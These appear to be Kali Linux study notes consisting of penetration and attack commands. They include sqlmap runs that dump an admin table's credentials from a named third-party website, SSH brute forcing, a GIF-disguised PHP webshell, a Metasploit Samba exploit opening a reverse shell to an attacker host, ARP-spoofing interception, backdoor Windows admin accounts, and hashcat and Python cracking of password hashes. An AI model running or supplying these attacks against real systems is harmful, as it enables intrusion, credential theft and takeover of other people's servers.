apt-get install <software name>    # install new software
apt-get remove <software name>     # uninstall software
medusa -h 10.10.5.246 -u root -P pass.txt -M ssh    # SSH brute force; -P is a password file (-p would be a single password)
crunch 1 3 -o aa.txt                                # every candidate of length 1 to 3 from the default charset
locate wordlist                                     # find the wordlists shipped with Kali
searchsploit openssl                                # search the local Exploit-DB copy
/usr/share/sqlmap/txt/wordlist.zip                  # sqlmap's bundled wordlist
sqlmap enumeration (-D database, -T table, -C columns are uppercase; lowercase -d is a direct DB connection string):
sqlmap -u "http://www.cowinbio.com/about/index.php?id=1" --dbs --current-user
sqlmap -u "http://www.cowinbio.com/about/index.php?id=1" --dbms mysql -D CW --tables
sqlmap -u "http://www.cowinbio.com/about/index.php?id=1" --dbms mysql -D cw -T admin --columns
sqlmap -u "http://www.cowinbio.com/about/index.php?id=1" --dbms mysql -D cw -T admin -C user,pwd --dump
sqlmap -u "http://www.cowinbio.com/about/index.php" --cookie "id=1" --tables --level 2    # cookie parameters are only tested from --level 2 upwards
sqlmap -u "http://www.cowinbio.com/about/index.php?id=1" --dbms mysql --tamper charunicodeencode -v 3    # tamper script for WAF bypass, verbose output
sqlmap -g "inurl:php?id="    # take targets from Google dork results
POST (login form) injection:
sqlmap -r search-test.txt -p tfupass                                         # -r replays a saved raw HTTP request, -p names the parameter to test
sqlmap -u "http://www.cowinbio.com/login.asp" --forms                        # let sqlmap find and test the forms on the page
sqlmap -u "http://www.cowinbio.com/login.asp" --data "tfuname=1&tfupass=1"   # POST body given explicitly
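The file given to -r is a raw HTTP request as saved from Burp or the browser's developer tools. The following is a constructed example for the login form above and is not from the original notes; the parameter names and the User-Agent are assumed from the --data command, and the Content-Length must match the body exactly or sqlmap will send a broken request:

```http
POST /login.asp HTTP/1.1
Host: www.cowinbio.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

tfuname=1&tfupass=1
```

Run it with `sqlmap -r search-test.txt -p tfupass`; without -p sqlmap tests every parameter in the body, the cookie and (at higher --level) the headers.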
sqlmap request throttling:
sqlmap -u "http://www.cowinbio.com/login.asp" --delay 1    # wait 1 second between requests
sqlmap -u "http://www.cowinbio.com/login.asp" --safe-url "http://www.cowinbio.com/" --safe-freq 3    # visit a harmless page every 3 requests; --safe-freq requires --safe-url (the URL here is an assumed example)
WAF bypass: use a --tamper script such as charunicodeencode (see the --tamper command above).
nikto -host "http://www.cowinbio.com/about/index.php?id=1"    # scan for the admin backend and other known paths
Google Hacking Database (GHDB): https://www.exploit-db.com/google-hacking-database/google-hacking-database
setoolkit    # Social-Engineer Toolkit (SET), social engineering attacks
OpenVAS: user admin, password 82207a15-be87-4ef7-a171-dbde81ef9ae9 (generated during setup), web UI at https://127.0.0.1:9392
Nessus: service nessusd start, then open https://127.0.0.1:8834
Upload bypass: prefix a PHP webshell with the GIF signature so a naive image check passes (the file still has to be executed as PHP by the server to be useful):
GIF89a
<?php @system($_GET["cmd"]); ?>
www.fleurlis.com.tw
http://www.wooyun.org/bugs/wooyun-2016-0224790/trace/94cba88d12cef35cdeb898f26d4bdda9
msfconsole -x "use exploit/multi/samba/usermap_script; \
set RHOST 172.16.194.172; \
set PAYLOAD cmd/unix/reverse; \
set LHOST 172.16.194.163; \
run"    # -x runs the quoted console commands at startup
hashcat -m 1800 -a 0 -o cra.txt shadow /usr/share/sqlmap/txt/wordlist.txt    # wordlist attack on sha512crypt ($6$) hashes; "shadow" should hold only the hash field (cut -d: -f2 /etc/shadow > shadow), cracked results go to cra.txt
Mask attack (-a 3) with custom charsets: --custom-charset1=?l?d (short form -1 ?l?d) defines ?1 as lowercase letters plus digits, so eight random lowercase-or-digit characters are written as the mask ?1?1?1?1?1?1?1?1. Complete example (-m 0 is raw MD5):
hashcat -a 3 -m 0 test.txt -1 ?l?d ?1?1?1?1?1?1?1?1
With --custom-charset2=xiao106347, ?2 stands for any one character from the set x i a o 1 0 6 3 4 7, so eight positions drawn from that set are:
hashcat -a 3 -m 0 test.txt -2 xiao106347 ?2?2?2?2?2?2?2?2
Two custom charsets in one mask, the first four positions from "xiao" and the last four digits:
hashcat -m 0 -a 3 -o ee1.txt test.hash -1 xiao -2 ?d ?1?1?1?1?2?2?2?2
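To see what those masks actually generate, the following mask expander is added here (it is not hashcat code and not from the original notes): it parses the -1/-2 custom charsets and the ?1/?2/?l/?d placeholders, reports the keyspace hashcat would print, and brute-forces a single raw MD5 (-m 0) over the mask. The target hash is constructed inline from the assumed password "xiao0728"; hashcat enumerates the same candidate set in a different internal order.

```python
import hashlib
import itertools

# Hashcat built-in charsets used in these notes (?l lowercase, ?u uppercase, ?d digits).
BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
}


def expand_charset(spec, custom):
    """Expand a charset argument such as 'xiao', '?l?d' or 'xiao?d' into its characters.
    'custom' maps '1'..'4' to already expanded custom charsets, so -2 may reuse ?1."""
    chars = []
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key in BUILTIN:
                chars.extend(BUILTIN[key])
            elif key in custom:
                chars.extend(custom[key])
            elif key == "?":            # '??' is a literal question mark
                chars.append("?")
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            chars.append(spec[i])       # plain literal character
            i += 1
    return "".join(dict.fromkeys(chars))   # de-duplicate, keep order


def parse_mask(mask, custom_specs):
    """Return the charset for each position of a mask like '?1?1?1?1?2?2?2?2'.
    custom_specs maps '1'..'4' to the raw -1/-2/... arguments given to hashcat."""
    custom = {}
    for key in sorted(custom_specs):
        custom[key] = expand_charset(custom_specs[key], custom)
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])   # literal character inside the mask
            i += 1
    return positions


def keyspace(mask, custom_specs):
    """Number of candidates the mask generates (the keyspace hashcat reports)."""
    n = 1
    for charset in parse_mask(mask, custom_specs):
        n *= len(charset)
    return n


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5(target_hex, mask, custom_specs):
    """Try every candidate of the mask against one raw MD5 hash (-m 0).
    Candidate order is itertools.product order, not hashcat's internal order."""
    for combo in itertools.product(*parse_mask(mask, custom_specs)):
        candidate = "".join(combo)
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


if __name__ == "__main__":
    # Same mask and custom charsets as the last hashcat command above.
    spec = {"1": "xiao", "2": "?d"}
    mask = "?1?1?1?1?2?2?2?2"
    print("keyspace:", keyspace(mask, spec))                 # 4^4 * 10^4 = 2,560,000
    # Constructed target (not from the page): the MD5 of the assumed password "xiao0728".
    print("cracked:", crack_md5(md5_hex("xiao0728"), mask, spec))
    print("keyspace of -1 ?l?d ?1?1?1?1?1?1?1?1:", keyspace("?1?1?1?1?1?1?1?1", {"1": "?l?d"}))   # 36^8
```

The keyspace numbers are the point: 36^8 (about 2.8 trillion) for eight lowercase-or-digit characters is a GPU job, whereas the "xiao" plus four digits mask is only 2.56 million candidates, which is why a mask built from what you already know about the target beats a blind brute force.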
Metasploit with database support on Kali 2.0. Kali 2.0 ships Metasploit, but there is no "metasploit" service, so "service metasploit start" does not work. Start it as follows:
1. Start the PostgreSQL database first: /etc/init.d/postgresql start (or service postgresql start)
2. Initialize the MSF database (the key step): msfdb init
3. Run msfconsole: msfconsole
4. Check the database connection inside MSF: db_status
Done.
db_rebuild_cache    # rebuild the module search cache stored in the database
crunch wordlist generation:
crunch 6 8 1234567890 -o w1.txt                    # every numeric string of 6 to 8 digits
crunch 11 11 -t @@@@@@@0728 -o w2.txt              # -t pattern: each @ is a lowercase letter, 0728 is fixed; min and max must equal the pattern length (11 here)
crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o w3.txt    # 8 characters from the "mixalpha" set defined in that charset file
ARP spoofing (man in the middle between the two hosts):
ettercap -i eth0 -Tq -M arp:remote /10.10.4.11// /10.10.7.34//    # -T text interface, -q quiet, -M MITM method; targets are written /IP// (MAC/IP/port fields)
CMD add user (Windows):
net user Luozt Luozt /add
net localgroup Administrators Luozt /add    # the group is "Administrators" (plural) on English Windows
IP forwarding (so the spoofed traffic is relayed instead of dropped): echo 1 > /proc/sys/net/ipv4/ip_forward
Kali Linux study notes